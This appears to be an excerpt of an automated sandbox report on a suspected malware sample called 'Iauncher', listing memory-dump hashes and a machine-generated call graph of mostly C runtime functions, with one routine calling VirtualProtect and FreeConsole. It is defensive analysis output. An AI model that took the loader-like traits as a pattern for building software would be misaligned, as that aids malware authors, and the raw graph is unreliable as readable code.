                                                                                                                                                    • Source File: 00000000.00000002.3684315895.0000000005DB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05DB0000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_5db0000_Iauncher.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID:
                                                                                                                                                    • Opcode ID: f574449eb9929ea265046054e642c5e9c9d846e43730972ec100065fb4ddbaf7
                                                                                                                                                    • Instruction ID: 159601de5a6a91e48944d5d18a712da7b9757cd342a032164f9dd712bdc17604
                                                                                                                                                    • Opcode Fuzzy Hash: f574449eb9929ea265046054e642c5e9c9d846e43730972ec100065fb4ddbaf7
                                                                                                                                                    • Instruction Fuzzy Hash: 8231E570E00219CFEB04DFA9D588BEEBBB2FB48301F10446AD411B7390D774AA45CBA5
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 05DB7A41 Relevance: .0, Instructions: 37COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.3684315895.0000000005DB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05DB0000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_5db0000_Iauncher.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID:
                                                                                                                                                    • Opcode ID: 97a4a17a1aa6b66ea2f3b7503c94e638f51f8e082e1d528ab67d8593a335f09d
                                                                                                                                                    • Instruction ID: b4ef15ab281b37ce2a79a419e6b976d1e227b89e379b405fccd991553571ab1e
                                                                                                                                                    • Opcode Fuzzy Hash: 97a4a17a1aa6b66ea2f3b7503c94e638f51f8e082e1d528ab67d8593a335f09d
                                                                                                                                                    • Instruction Fuzzy Hash: CEF06275F002099FDB00DFA8D844ADEBBF5EB4A221F1041A6E519E7351D671ED018B65
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Execution Graph

                                                                                                                                                    Execution Coverage:5.2%
                                                                                                                                                    Dynamic/Decrypted Code Coverage:100%
                                                                                                                                                    Signature Coverage:0.9%
                                                                                                                                                    Total number of Nodes:2000
                                                                                                                                                    Total number of Limit Nodes:79
                                                                                                                                                    execution_graph 19087 565a56 19088 565a78 19087->19088 19092 565a8d 19087->19092 19093 565166 19088->19093 19096 5651d2 19093->19096 19097 565181 19093->19097 19094 5662ac __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 5 API calls 19095 5651ea 19094->19095 19095->19092 19099 56f17e 19095->19099 19096->19094 19097->19096 19098 56f796 69 API calls 19097->19098 19098->19096 19100 56f19e 19099->19100 19101 56f189 19099->19101 19100->19101 19103 56f1a5 19100->19103 19102 56e2e0 __dosmaperr 14 API calls 19101->19102 19104 56f18e 19102->19104 19109 56f494 19103->19109 19106 56accf __strnicoll 41 API calls 19104->19106 19108 56f199 19106->19108 19108->19092 19110 56f4a7 _Fputc 19109->19110 19115 56f233 19110->19115 19113 56aa0b _Fputc 41 API calls 19114 56f1b4 19113->19114 19114->19092 19116 56f23f __FrameHandler3::FrameUnwindToState 19115->19116 19117 56f245 19116->19117 19119 56f279 19116->19119 19118 56ac52 _Deallocate 29 API calls 19117->19118 19121 56f260 19118->19121 19126 56e417 EnterCriticalSection 19119->19126 19121->19113 19122 56f285 19127 56f3a8 19122->19127 19124 56f29c 19136 56f2c5 19124->19136 19126->19122 19128 56f3ce 19127->19128 19129 56f3bb 19127->19129 19139 56f2cf 19128->19139 19129->19124 19131 56f3f1 19132 56eea4 ___scrt_uninitialize_crt 66 API calls 19131->19132 19135 56f47f 19131->19135 19133 56f41f 19132->19133 19143 578b99 19133->19143 19135->19124 19152 56e42b LeaveCriticalSection 19136->19152 19138 56f2cd 19138->19121 19140 56f2e0 19139->19140 19142 56f338 19139->19142 19140->19142 19146 578b59 19140->19146 19142->19131 19144 578a78 ___scrt_uninitialize_crt 43 API calls 19143->19144 19145 578bb2 19144->19145 19145->19135 19147 578b6d _Fputc 19146->19147 19148 578a78 ___scrt_uninitialize_crt 43 API calls 19147->19148 19149 578b82 19148->19149 19150 56aa0b _Fputc 41 API calls 19149->19150 19151 578b91 19150->19151 19151->19142 19152->19138 21293 57575a 21294 575766 __FrameHandler3::FrameUnwindToState 21293->21294 21305 56d9e4 EnterCriticalSection 21294->21305 21296 57576d 21306 57a86a 21296->21306 21299 57578b 21325 5757b1 21299->21325 21304 5756aa 2 API calls 21304->21299 21305->21296 21307 57a876 __FrameHandler3::FrameUnwindToState 21306->21307 21308 57a8a0 21307->21308 21309 57a87f 21307->21309 21328 56d9e4 EnterCriticalSection 21308->21328 21311 56e2e0 __dosmaperr 14 API calls 21309->21311 21312 57a884 21311->21312 21313 56accf __strnicoll 41 API calls 21312->21313 21315 57577c 21313->21315 21314 57a8d8 21336 57a8ff 21314->21336 21315->21299 21319 5755f4 GetStartupInfoW 21315->21319 21316 57a8ac 21316->21314 21329 57a7ba 21316->21329 21320 575611 21319->21320 21321 5756a5 21319->21321 21320->21321 21322 57a86a 42 API calls 21320->21322 21321->21304 21323 575639 21322->21323 21323->21321 21324 575669 GetFileType 21323->21324 21324->21323 21340 56da2c LeaveCriticalSection 21325->21340 21327 57579c 21328->21316 21330 574339 __Getctype 14 API calls 21329->21330 21335 57a7cc 21330->21335 21331 57a7d9 21332 574396 ___free_lconv_mon 14 API calls 21331->21332 21334 57a82e 21332->21334 21333 575d94 6 API calls 21333->21335 21334->21316 21335->21331 21335->21333 21339 56da2c LeaveCriticalSection 21336->21339 21338 57a906 21338->21315 21339->21338 21340->21327 19210 563644 19211 563674 19210->19211 19218 56423e 19211->19218 19216 5662ac __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 5 API calls 19217 5636ab 19216->19217 19253 564210 19218->19253 19221 562dd1 19222 562e03 19221->19222 19223 561d84 73 API calls 19222->19223 19224 562e59 std::ios_base::_Ios_base_dtor 19223->19224 19225 561fa0 43 API calls 19224->19225 19226 562e71 19225->19226 19227 561e76 75 API calls 19226->19227 19241 562ea9 std::ios_base::_Ios_base_dtor 19227->19241 19228 562f60 19231 562fb6 19228->19231 19232 562f67 19228->19232 19229 563008 19233 5631e2 70 API calls 19229->19233 19230 562f24 19230->19228 19230->19229 19235 5631e2 70 API calls 19231->19235 19234 563217 70 API calls 19232->19234 19236 562fb1 19233->19236 19237 562f7f 19234->19237 19238 562fd9 19235->19238 19239 5631e2 70 API calls 19236->19239 19240 5631e2 70 API calls 19237->19240 19242 563217 70 API calls 19238->19242 19243 563068 19239->19243 19240->19236 19241->19230 19244 563fa3 43 API calls 19241->19244 19242->19236 19245 563217 70 API calls 19243->19245 19244->19241 19246 563098 19245->19246 19247 563359 std::ios_base::_Init 41 API calls 19246->19247 19248 5630a4 19247->19248 19249 56337f 41 API calls 19248->19249 19250 5630ad 19249->19250 19251 5662ac __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 5 API calls 19250->19251 19252 5630be 19251->19252 19252->19216 19254 564227 _swprintf 19253->19254 19257 56d45f 19254->19257 19258 56d473 _Fputc 19257->19258 19263 56bad1 19258->19263 19261 56aa0b _Fputc 41 API calls 19262 563683 19261->19262 19262->19221 19264 56bb00 19263->19264 19265 56badd 19263->19265 19269 56bb27 19264->19269 19271 56b95d 19264->19271 19266 56ac52 _Deallocate 29 API calls 19265->19266 19270 56baf8 19266->19270 19268 56ac52 _Deallocate 29 API calls 19268->19270 19269->19268 19269->19270 19270->19261 19272 56b9ac 19271->19272 19273 56b989 19271->19273 19272->19273 19276 56b9b4 _swprintf 19272->19276 19274 56ac52 _Deallocate 29 API calls 19273->19274 19280 56b9a1 19274->19280 19275 5662ac __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 5 API calls 19277 56bacf 19275->19277 19282 56c806 19276->19282 19277->19269 19280->19275 19299 56d3c7 19282->19299 19284 56ba35 19296 56c657 19284->19296 19285 56c82d 19286 56ac52 _Deallocate 29 API calls 19285->19286 19286->19284 19291 56c81f _swprintf 19291->19284 19291->19285 19292 56ca6e 19291->19292 19303 56b7f0 19291->19303 19310 56c78e 19291->19310 19313 56cae6 19291->19313 19347 56cc44 19291->19347 19293 56ac52 _Deallocate 29 API calls 19292->19293 19294 56ca8a 19293->19294 19295 56ac52 _Deallocate 29 API calls 19294->19295 19295->19284 19297 574396 ___free_lconv_mon 14 API calls 19296->19297 19298 56c667 19297->19298 19298->19280 19300 56d3d2 19299->19300 19302 56d3eb 19299->19302 19301 56ac52 _Deallocate 29 API calls 19300->19301 19301->19302 19302->19291 19376 56aab6 19303->19376 19417 56bc3a 19310->19417 19312 56c7c9 19312->19291 19314 56cb04 19313->19314 19315 56caed 19313->19315 19316 56cb43 19314->19316 19319 56ac52 _Deallocate 29 API calls 19314->19319 19315->19316 19317 56ccdc 19315->19317 19318 56cc6b 19315->19318 19316->19291 19322 56cce1 19317->19322 19323 56cd2f 19317->19323 19320 56cc71 19318->19320 19321 56cd09 19318->19321 19324 56cb38 19319->19324 19329 56ccae 19320->19329 19334 56cc77 19320->19334 19459 56bfe4 19321->19459 19325 56cd23 19322->19325 19326 56cce3 19322->19326 19323->19321 19323->19329 19346 56cc93 _swprintf 19323->19346 19324->19291 19476 56d340 19325->19476 19327 56cc85 19326->19327 19328 56cce8 19326->19328 19345 56cca7 _swprintf 19327->19345 19327->19346 19466 56d080 19327->19466 19328->19321 19333 56cced 19328->19333 19329->19345 19440 56c161 19329->19440 19332 56ccc3 19332->19345 19447 56d20a 19332->19447 19337 56ccf2 19333->19337 19338 56cd00 19333->19338 19334->19327 19334->19332 19334->19346 19337->19345 19451 56d323 19337->19451 19455 56d29f 19338->19455 19340 5662ac __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 5 API calls 19343 56cfd0 19340->19343 19343->19291 19345->19340 19346->19345 19479 575158 19346->19479 19348 56ccdc 19347->19348 19349 56cc6b 19347->19349 19352 56cce1 19348->19352 19353 56cd2f 19348->19353 19350 56cc71 19349->19350 19351 56cd09 19349->19351 19356 56ccae 19350->19356 19362 56cc77 19350->19362 19357 56bfe4 _swprintf 30 API calls 19351->19357 19354 56cd23 19352->19354 19355 56cce3 19352->19355 19353->19351 19353->19356 19374 56cc93 _swprintf 19353->19374 19360 56d340 _swprintf 30 API calls 19354->19360 19358 56cc85 19355->19358 19359 56cce8 19355->19359 19365 56c161 _swprintf 30 API calls 19356->19365 19375 56cca7 _swprintf 19356->19375 19357->19374 19363 56d080 _swprintf 44 API calls 19358->19363 19358->19374 19358->19375 19359->19351 19364 56cced 19359->19364 19360->19374 19361 56ccc3 19370 56d20a _swprintf 43 API calls 19361->19370 19361->19375 19362->19358 19362->19361 19362->19374 19363->19374 19366 56ccf2 19364->19366 19367 56cd00 19364->19367 19365->19374 19371 56d323 _swprintf 30 API calls 19366->19371 19366->19375 19369 56d29f _swprintf 29 API calls 19367->19369 19368 5662ac __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 5 API calls 19372 56cfd0 19368->19372 19369->19374 19370->19374 19371->19374 19372->19291 19373 575158 _Fputc 43 API calls 19373->19374 19374->19373 19374->19375 19375->19368 19377 56aac0 19376->19377 19378 56aac9 19376->19378 19391 56aa70 GetLastError 19377->19391 19383 574531 19378->19383 19380 56aac5 19380->19378 19381 5700d9 __purecall 41 API calls 19380->19381 19382 56aad2 19381->19382 19384 56b81d 19383->19384 19385 574548 19383->19385 19387 57458f 19384->19387 19385->19384 19386 57b9f5 __Getctype 41 API calls 19385->19386 19386->19384 19388 5745a6 19387->19388 19389 56b82a 19387->19389 19388->19389 19390 57a0a7 __strnicoll 41 API calls 19388->19390 19389->19291 19390->19389 19392 56aa89 19391->19392 19395 5732e2 19392->19395 19396 5732f5 19395->19396 19397 5732fb 19395->19397 19399 575c98 __Getctype 6 API calls 19396->19399 19398 575cd7 __Getctype 6 API calls 19397->19398 19416 56aaa1 SetLastError 19397->19416 19400 573315 19398->19400 19399->19397 19401 574339 __Getctype 14 API calls 19400->19401 19400->19416 19402 573325 19401->19402 19403 573342 19402->19403 19404 57332d 19402->19404 19406 575cd7 __Getctype 6 API calls 19403->19406 19405 575cd7 __Getctype 6 API calls 19404->19405 19407 573339 19405->19407 19408 57334e 19406->19408 19412 574396 ___free_lconv_mon 14 API calls 19407->19412 19409 573352 19408->19409 19410 573361 19408->19410 19413 575cd7 __Getctype 6 API calls 19409->19413 19411 572f0e __Getctype 14 API calls 19410->19411 19414 57336c 19411->19414 19412->19416 19413->19407 19415 574396 ___free_lconv_mon 14 API calls 19414->19415 19415->19416 19416->19380 19427 56b84b 19417->19427 19419 56bc61 19421 56ac52 _Deallocate 29 API calls 19419->19421 19420 56bc4c 19420->19419 19423 56bc94 19420->19423 19426 56bc7c _swprintf 19420->19426 19421->19426 19422 56bd2b 19424 56b797 _swprintf 41 API calls 19422->19424 19423->19422 19434 56b797 19423->19434 19424->19426 19426->19312 19428 56b863 19427->19428 19429 56b850 19427->19429 19428->19420 19430 56e2e0 __dosmaperr 14 API calls 19429->19430 19431 56b855 19430->19431 19432 56accf __strnicoll 41 API calls 19431->19432 19433 56b860 19432->19433 19433->19420 19435 56b7bc 19434->19435 19436 56b7a8 19434->19436 19435->19422 19436->19435 19437 56e2e0 __dosmaperr 14 API calls 19436->19437 19438 56b7b1 19437->19438 19439 56accf __strnicoll 41 API calls 19438->19439 19439->19435 19441 56c175 _swprintf 19440->19441 19442 56c197 19441->19442 19444 56c1be 19441->19444 19443 56ac52 _Deallocate 29 API calls 19442->19443 19446 56c1b4 _swprintf 19443->19446 19444->19446 19489 56bb88 19444->19489 19446->19346 19448 56d225 _swprintf 19447->19448 19449 56d25c 19448->19449 19450 575158 _Fputc 43 API calls 19448->19450 19449->19346 19450->19449 19452 56d32f 19451->19452 19503 56be67 19452->19503 19454 56d33f 19454->19346 19458 56d2b4 _swprintf 19455->19458 19456 56ac52 _Deallocate 29 API calls 19457 56d2d5 19456->19457 19457->19346 19458->19456 19458->19457 19460 56bff8 _swprintf 19459->19460 19461 56c01a 19460->19461 19464 56c041 19460->19464 19462 56ac52 _Deallocate 29 API calls 19461->19462 19463 56c037 _swprintf 19462->19463 19463->19346 19464->19463 19465 56bb88 _swprintf 15 API calls 19464->19465 19465->19463 19467 56d09a 19466->19467 19468 56bb88 _swprintf 15 API calls 19467->19468 19469 56d0db _swprintf 19468->19469 19510 574fd7 19469->19510 19472 56d189 _swprintf 19474 56b7f0 _Fputc 41 API calls 19472->19474 19475 56d1bc _swprintf 19472->19475 19473 56b7f0 _Fputc 41 API calls 19473->19472 19474->19475 19475->19346 19477 56c161 _swprintf 30 API calls 19476->19477 19478 56d355 19477->19478 19478->19346 19480 57516d 19479->19480 19481 5751ae 19480->19481 19483 56b7f0 _Fputc 41 API calls 19480->19483 19486 575171 codecvt _Fputc 19480->19486 19488 57519a codecvt 19480->19488 19484 578faf _Fputc WideCharToMultiByte 19481->19484 19481->19486 19481->19488 19482 56ac52 _Deallocate 29 API calls 19482->19486 19483->19481 19485 575269 19484->19485 19485->19486 19487 57527f GetLastError 19485->19487 19486->19346 19487->19486 19487->19488 19488->19482 19488->19486 19490 56bbaf 19489->19490 19497 56bb9d 19489->19497 19491 5745c0 __strnicoll 15 API calls 19490->19491 19490->19497 19492 56bbd3 19491->19492 19493 56bbe6 19492->19493 19494 56bbdb 19492->19494 19500 56c671 19493->19500 19495 574396 ___free_lconv_mon 14 API calls 19494->19495 19495->19497 19497->19446 19499 574396 ___free_lconv_mon 14 API calls 19499->19497 19501 574396 ___free_lconv_mon 14 API calls 19500->19501 19502 56bbf1 19501->19502 19502->19499 19504 56be7b _swprintf 19503->19504 19505 56bec4 19504->19505 19506 56be9d 19504->19506 19508 56beba _swprintf 19505->19508 19509 56bb88 _swprintf 15 API calls 19505->19509 19507 56ac52 _Deallocate 29 API calls 19506->19507 19507->19508 19508->19454 19509->19508 19511 57500c 19510->19511 19512 574fe8 19510->19512 19511->19512 19514 57503f _swprintf 19511->19514 19513 56ac52 _Deallocate 29 API calls 19512->19513 19526 56d165 19513->19526 19515 5750a7 19514->19515 19516 575078 19514->19516 19517 5750d0 19515->19517 19518 5750d5 19515->19518 19529 574e7b 19516->19529 19520 575137 19517->19520 19521 5750fd 19517->19521 19537 574713 19518->19537 19564 574a3f 19520->19564 19523 575102 19521->19523 19524 57511d 19521->19524 19547 574dac 19523->19547 19557 574c28 19524->19557 19526->19472 19526->19473 19530 574e91 19529->19530 19531 574e9c 19529->19531 19530->19526 19532 572c88 ___std_exception_copy 41 API calls 19531->19532 19533 574ef7 19532->19533 19534 574f01 19533->19534 19535 56acfc _Deallocate 11 API calls 19533->19535 19534->19526 19536 574f0f 19535->19536 19538 574726 19537->19538 19539 574757 19538->19539 19540 574735 19538->19540 19542 574771 19539->19542 19544 5747c6 19539->19544 19541 56ac52 _Deallocate 29 API calls 19540->19541 19546 57474d _swprintf __alldvrm codecvt _strrchr 19541->19546 19543 574a3f _swprintf 43 API calls 19542->19543 19543->19546 19545 56b7f0 _Fputc 41 API calls 19544->19545 19544->19546 19545->19546 19546->19526 19548 57d4f1 _swprintf 43 API calls 19547->19548 19549 574ddc 19548->19549 19550 57d3f7 _swprintf 29 API calls 19549->19550 19551 574e1a 19550->19551 19552 574e21 19551->19552 19553 574e5a 19551->19553 19555 574e33 19551->19555 19552->19526 19554 574ae3 _swprintf 41 API calls 19553->19554 19554->19552 19556 574cbe _swprintf 41 API calls 19555->19556 19556->19552 19558 57d4f1 _swprintf 43 API calls 19557->19558 19559 574c57 19558->19559 19560 57d3f7 _swprintf 29 API calls 19559->19560 19561 574c98 19560->19561 19562 574c9f 19561->19562 19563 574cbe _swprintf 41 API calls 19561->19563 19562->19526 19563->19562 19565 57d4f1 _swprintf 43 API calls 19564->19565 19566 574a69 19565->19566 19567 57d3f7 _swprintf 29 API calls 19566->19567 19568 574ab7 19567->19568 19569 574abe 19568->19569 19570 574ae3 _swprintf 41 API calls 19568->19570 19569->19526 19570->19569 19571 56104e 19576 564d29 19571->19576 19573 561061 19580 56682c 19573->19580 19577 564d35 __EH_prolog3 19576->19577 19583 565759 19577->19583 19579 564d87 std::ios_base::_Init 19579->19573 19643 5667ff 19580->19643 19592 565349 19583->19592 19585 565764 19586 5641cf 73 API calls 19585->19586 19587 565777 19586->19587 19588 565791 19587->19588 19589 5634b8 std::ios_base::_Init 43 API calls 19587->19589 19590 56579d 19588->19590 19600 56612e 19588->19600 19589->19588 19590->19579 19593 565355 __EH_prolog3 19592->19593 19594 5634b8 std::ios_base::_Init 43 API calls 19593->19594 19595 565386 19594->19595 19596 56626e std::ios_base::_Init 43 API calls 19595->19596 19597 56538d 19596->19597 19599 56539e std::ios_base::_Init 19597->19599 19605 56462e 19597->19605 19599->19585 19601 5642b1 std::_Lockit::_Lockit 7 API calls 19600->19601 19602 56613e 19601->19602 19603 564309 std::_Lockit::~_Lockit 2 API calls 19602->19603 19604 56617c 19603->19604 19604->19590 19606 56463a __EH_prolog3 19605->19606 19607 5642b1 std::_Lockit::_Lockit 7 API calls 19606->19607 19608 564645 19607->19608 19609 564676 19608->19609 19617 564791 19608->19617 19611 564309 std::_Lockit::~_Lockit 2 API calls 19609->19611 19615 5646b3 std::ios_base::_Init 19611->19615 19612 564658 19623 5647b4 19612->19623 19615->19599 19616 564586 _Yarn 15 API calls 19616->19609 19618 56626e std::ios_base::_Init 43 API calls 19617->19618 19619 56479c 19618->19619 19620 5647b0 19619->19620 19627 5644c2 19619->19627 19620->19612 19624 5647c0 19623->19624 19626 564660 19623->19626 19630 5660a4 19624->19630 19626->19616 19628 564586 _Yarn 15 API calls 19627->19628 19629 5644fc 19628->19629 19629->19612 19631 5660b4 EncodePointer 19630->19631 19632 5700d9 19630->19632 19631->19626 19631->19632 19633 578cfb std::locale::_Setgloballocale 2 API calls 19632->19633 19634 5700de 19633->19634 19635 578d40 std::locale::_Setgloballocale 41 API calls 19634->19635 19638 5700e9 19634->19638 19635->19638 19636 5700f3 IsProcessorFeaturePresent 19639 5700ff 19636->19639 19637 570f58 std::locale::_Setgloballocale 23 API calls 19640 57011c 19637->19640 19638->19636 19642 570112 19638->19642 19641 56aad3 std::locale::_Setgloballocale 8 API calls 19639->19641 19641->19642 19642->19637 19644 566815 19643->19644 19645 56680e 19643->19645 19652 572a7d 19644->19652 19649 572a00 19645->19649 19648 56106b 19650 572a7d 44 API calls 19649->19650 19651 572a12 19650->19651 19651->19648 19655 5727c9 19652->19655 19656 5727d5 __FrameHandler3::FrameUnwindToState 19655->19656 19663 56d9e4 EnterCriticalSection 19656->19663 19658 5727e3 19664 572824 19658->19664 19660 5727f0 19674 572818 19660->19674 19663->19658 19665 5728b2 std::_Lockit::_Lockit 19664->19665 19666 57283f 19664->19666 19665->19660 19666->19665 19673 572892 19666->19673 19677 57cd1b 19666->19677 19668 57cd1b 44 API calls 19670 5728a8 19668->19670 19669 572888 19672 574396 ___free_lconv_mon 14 API calls 19669->19672 19671 574396 ___free_lconv_mon 14 API calls 19670->19671 19671->19665 19672->19673 19673->19665 19673->19668 19705 56da2c LeaveCriticalSection 19674->19705 19676 572801 19676->19648 19678 57cd28 19677->19678 19680 57cd43 19677->19680 19679 57cd34 19678->19679 19678->19680 19681 56e2e0 __dosmaperr 14 API calls 19679->19681 19683 57cd52 19680->19683 19686 58044f 19680->19686 19685 57cd39 codecvt 19681->19685 19693 578bb7 19683->19693 19685->19669 19687 58045a 19686->19687 19688 58046f HeapSize 19686->19688 19689 56e2e0 __dosmaperr 14 API calls 19687->19689 19688->19683 19690 58045f 19689->19690 19691 56accf __strnicoll 41 API calls 19690->19691 19692 58046a 19691->19692 19692->19683 19694 578bc4 19693->19694 19695 578bcf 19693->19695 19696 5745c0 __strnicoll 15 API calls 19694->19696 19697 578bd7 19695->19697 19703 578be0 __Getctype 19695->19703 19701 578bcc 19696->19701 19698 574396 ___free_lconv_mon 14 API calls 19697->19698 19698->19701 19699 578be5 19702 56e2e0 __dosmaperr 14 API calls 19699->19702 19700 578c0a HeapReAlloc 19700->19701 19700->19703 19701->19685 19702->19701 19703->19699 19703->19700 19704 5703b0 std::ios_base::_Init 2 API calls 19703->19704 19704->19703 19705->19676 21374 565976 21375 56598a 21374->21375 21376 565166 69 API calls 21375->21376 21381 5659e5 21375->21381 21377 5659b5 21376->21377 21378 56f494 68 API calls 21377->21378 21379 5659d2 21377->21379 21377->21381 21378->21379 21379->21381 21382 56f123 21379->21382 21383 56f143 21382->21383 21384 56f12e 21382->21384 21386 56f160 21383->21386 21387 56f14b 21383->21387 21385 56e2e0 __dosmaperr 14 API calls 21384->21385 21388 56f133 21385->21388 21396 578911 21386->21396 21389 56e2e0 __dosmaperr 14 API calls 21387->21389 21391 56accf __strnicoll 41 API calls 21388->21391 21392 56f150 21389->21392 21394 56f13e 21391->21394 21395 56accf __strnicoll 41 API calls 21392->21395 21393 56f15b 21393->21381 21394->21381 21395->21393 21397 578925 _Fputc 21396->21397 21402 578326 21397->21402 21400 56aa0b _Fputc 41 API calls 21401 57893f 21400->21401 21401->21393 21403 578332 __FrameHandler3::FrameUnwindToState 21402->21403 21404 57835c 21403->21404 21405 578339 21403->21405 21413 56e417 EnterCriticalSection 21404->21413 21406 56ac52 _Deallocate 29 API calls 21405->21406 21409 578352 21406->21409 21408 57836a 21414 5783b5 21408->21414 21409->21400 21411 578379 21427 5783ab 21411->21427 21413->21408 21415 5783c4 21414->21415 21416 5783ec 21414->21416 21418 56ac52 _Deallocate 29 API calls 21415->21418 21417 575466 _Ungetc 41 API calls 21416->21417 21419 5783f5 21417->21419 21420 5783df __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z 21418->21420 21430 578b3b 21419->21430 21420->21411 21423 5784b6 21423->21420 21445 578556 21423->21445 21424 57849f 21433 578715 21424->21433 21452 56e42b LeaveCriticalSection 21427->21452 21429 5783b3 21429->21409 21431 578952 45 API calls 21430->21431 21432 578413 21431->21432 21432->21420 21432->21423 21432->21424 21434 578724 ___scrt_uninitialize_crt 21433->21434 21435 575466 _Ungetc 41 API calls 21434->21435 21437 578740 __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z 21435->21437 21436 5662ac __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 5 API calls 21438 5788be 21436->21438 21439 578b3b 45 API calls 21437->21439 21444 57874c 21437->21444 21438->21420 21440 5787a0 21439->21440 21441 5787d2 ReadFile 21440->21441 21440->21444 21442 5787f9 21441->21442 21441->21444 21443 578b3b 45 API calls 21442->21443 21443->21444 21444->21436 21446 575466 _Ungetc 41 API calls 21445->21446 21447 578569 21446->21447 21448 578b3b 45 API calls 21447->21448 21451 5785b1 __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z 21447->21451 21449 578604 21448->21449 21450 578b3b 45 API calls 21449->21450 21449->21451 21450->21451 21451->21420 21452->21429 17139 566464 17140 566470 __FrameHandler3::FrameUnwindToState 17139->17140 17165 566666 17140->17165 17142 5665d0 17214 566d9f IsProcessorFeaturePresent 17142->17214 17144 566477 17144->17142 17153 5664a1 ___scrt_is_nonwritable_in_current_image ___scrt_release_startup_lock std::locale::_Setgloballocale 17144->17153 17145 5665d7 17194 570f94 17145->17194 17150 5664c0 17151 566541 17176 570bd2 17151->17176 17153->17150 17153->17151 17197 570f6e 17153->17197 17155 566547 17180 583416 17155->17180 17166 56666f 17165->17166 17221 56687c IsProcessorFeaturePresent 17166->17221 17170 566680 17175 566684 17170->17175 17231 572bab 17170->17231 17173 56669b 17173->17144 17175->17144 17177 570be0 17176->17177 17178 570bdb 17176->17178 17177->17155 17303 57092c 17178->17303 17959 561f47 17180->17959 17185 58344b VirtualProtect FreeConsole 17978 58339a 17185->17978 18601 570d7c 17194->18601 17198 570f84 __FrameHandler3::FrameUnwindToState std::_Lockit::_Lockit 17197->17198 17198->17151 17199 5730e0 __Getctype 41 API calls 17198->17199 17202 572c5d 17199->17202 17200 5700d9 __purecall 41 API calls 17201 572c87 17200->17201 17202->17200 17215 566db5 codecvt std::locale::_Setgloballocale 17214->17215 17216 566e60 IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter 17215->17216 17217 566ea4 std::locale::_Setgloballocale 17216->17217 17217->17145 17218 570f58 17219 570d7c std::locale::_Setgloballocale 23 API calls 17218->17219 17220 5665e5 17219->17220 17222 56667b 17221->17222 17223 5695de 17222->17223 17240 56a6b7 17223->17240 17226 5695e7 17226->17170 17228 5695ef 17229 5695fa 17228->17229 17254 56a6f3 17228->17254 17229->17170 17294 57cda3 17231->17294 17234 5695fd 17235 569606 17234->17235 17236 569610 17234->17236 17237 569776 ___vcrt_uninitialize_ptd 6 API calls 17235->17237 17236->17175 17238 56960b 17237->17238 17239 56a6f3 ___vcrt_uninitialize_locks DeleteCriticalSection 17238->17239 17239->17236 17241 56a6c0 17240->17241 17243 56a6e9 17241->17243 17244 5695e3 17241->17244 17258 56a8fc 17241->17258 17245 56a6f3 ___vcrt_uninitialize_locks DeleteCriticalSection 17243->17245 17244->17226 17246 569743 17244->17246 17245->17244 17275 56a80d 17246->17275 17249 569758 17249->17228 17252 569773 17252->17228 17255 56a71d 17254->17255 17256 56a6fe 17254->17256 17255->17226 17257 56a708 DeleteCriticalSection 17256->17257 17257->17255 17257->17257 17263 56a722 17258->17263 17261 56a934 InitializeCriticalSectionAndSpinCount 17262 56a91f 17261->17262 17262->17241 17264 56a73f 17263->17264 17267 56a743 17263->17267 17264->17261 17264->17262 17265 56a7ab GetProcAddress 17265->17264 17267->17264 17267->17265 17268 56a79c 17267->17268 17270 56a7c2 LoadLibraryExW 17267->17270 17268->17265 17269 56a7a4 FreeLibrary 17268->17269 17269->17265 17271 56a809 17270->17271 17272 56a7d9 GetLastError 17270->17272 17271->17267 17272->17271 17273 56a7e4 ___vcrt_FlsFree 17272->17273 17273->17271 17274 56a7fa LoadLibraryExW 17273->17274 17274->17267 17276 56a722 ___vcrt_FlsFree 5 API calls 17275->17276 17277 56a827 17276->17277 17278 56a840 TlsAlloc 17277->17278 17279 56974d 17277->17279 17279->17249 17280 56a8be 17279->17280 17281 56a722 ___vcrt_FlsFree 5 API calls 17280->17281 17282 56a8d8 17281->17282 17283 56a8f3 TlsSetValue 17282->17283 17284 569766 17282->17284 17283->17284 17284->17252 17285 569776 17284->17285 17286 569780 17285->17286 17287 569786 17285->17287 17289 56a848 17286->17289 17287->17249 17290 56a722 ___vcrt_FlsFree 5 API calls 17289->17290 17291 56a862 17290->17291 17292 56a87a TlsFree 17291->17292 17293 56a86e 17291->17293 17292->17293 17293->17287 17295 57cdb3 17294->17295 17296 56668d 17294->17296 17295->17296 17298 5756aa 17295->17298 17296->17173 17296->17234 17299 5756b1 17298->17299 17300 5756f4 GetStdHandle 17299->17300 17301 575756 17299->17301 17302 575707 GetFileType 17299->17302 17300->17299 17301->17295 17302->17299 17304 570935 17303->17304 17307 57094b 17303->17307 17304->17307 17309 570958 17304->17309 17306 570942 17306->17307 17326 570ac3 17306->17326 17307->17177 17310 570964 17309->17310 17311 570961 17309->17311 17334 57a05f 17310->17334 17311->17306 17316 570975 17361 574396 17316->17361 17317 570981 17367 5709b2 17317->17367 17322 574396 ___free_lconv_mon 14 API calls 17323 5709a5 17322->17323 17324 574396 ___free_lconv_mon 14 API calls 17323->17324 17325 5709ab 17324->17325 17325->17306 17327 570ad2 17326->17327 17328 570b34 17326->17328 17327->17328 17329 574339 __Getctype 14 API calls 17327->17329 